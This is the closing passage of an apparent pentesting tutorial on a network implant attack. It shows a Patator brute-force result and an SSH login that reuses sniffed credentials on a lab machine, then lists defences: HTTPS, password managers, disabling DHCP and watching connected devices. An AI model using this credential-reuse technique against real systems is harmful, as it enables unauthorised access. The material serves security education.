The Patator request didn't return an "Authentication failed" message this time. This is a pretty good indication the password is correct. The same username and password can be used to log into the SSH server for a password reuse attack.

root@orangepizero:/opt/patator# cd
root@orangepizero:~# ssh -p 22 tokyoneon@192.168.8.183

The authenticity of host '192.168.8.183 (192.168.8.183)' can't be established.
ECDSA key fingerprint is SHA256:3QmOhr8syz8l4HBWICG53DdVE2fStfHdO2Ri/nU4hBc.
Are you sure you want to continue connecting (yes/no)? yes

Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-29-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Mon Apr 15 07:27:14 2019 from 127.0.0.1

tokyoneon@ubuntu:~$

How to Protect Yourself Against Network Implant Attacks

  • Enable HTTPS: The media server on the network didn't support HTTPS. This allowed the attacker to observe the login credentials using Bettercap. The use of HTTPS and other encrypted protocols will go a long way in thwarting an attackers ability to compromise the network further.
  • Use Passwords Managers: The attacker in this example was able to reuse the media server password on the SSH server. The use of a password manager would've helped prevent the attacker from gaining access to the Ubuntu machine. It's always a bad idea to reuse passwords across multiple online accounts, servers, and operating systems.
  • Disable DHCP: This attack relies on the router issuing an IP address to the Orange Pi Zero when it's implanted. Without an IP address, Tor won't be able to connect to the internet. This would hinder the attackers able to access the network remotely. Disabling DHCP will only create an obstacle for the attacker, however. It wouldn't be impossible to enumerate the IP address and netmask for a static connection. Furthermore, if the attacker is still in the area, they would be able to use the Orange Pi Zero's Wi-Fi hotspot to identify the IP and netmask scheme manually.
  • Be Alert: Be mindful of the people and devices authenticated to the router you're connecting to. It also doesn't hurt to inspect devices physically attached to the router occasionally. This is especially important for router administrators operating in public areas like coffee shops, hospitals, and libraries. Public networks like these are prime targets for hackers looking to compromise as many people and services as possible.

Setting up the Orange Pi Zero and performing these attacks on my test networks was a lot of fun. I highly encourage readers to give this kind of attack a try and deploy cheap SBCs during pentesting engagements.

Until next time, you can follow me on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or message me on Twitter if you have any questions.

Cover photo by tokyoneon/Null Byte

Comments

No Comments Exist

Be the first, drop a comment!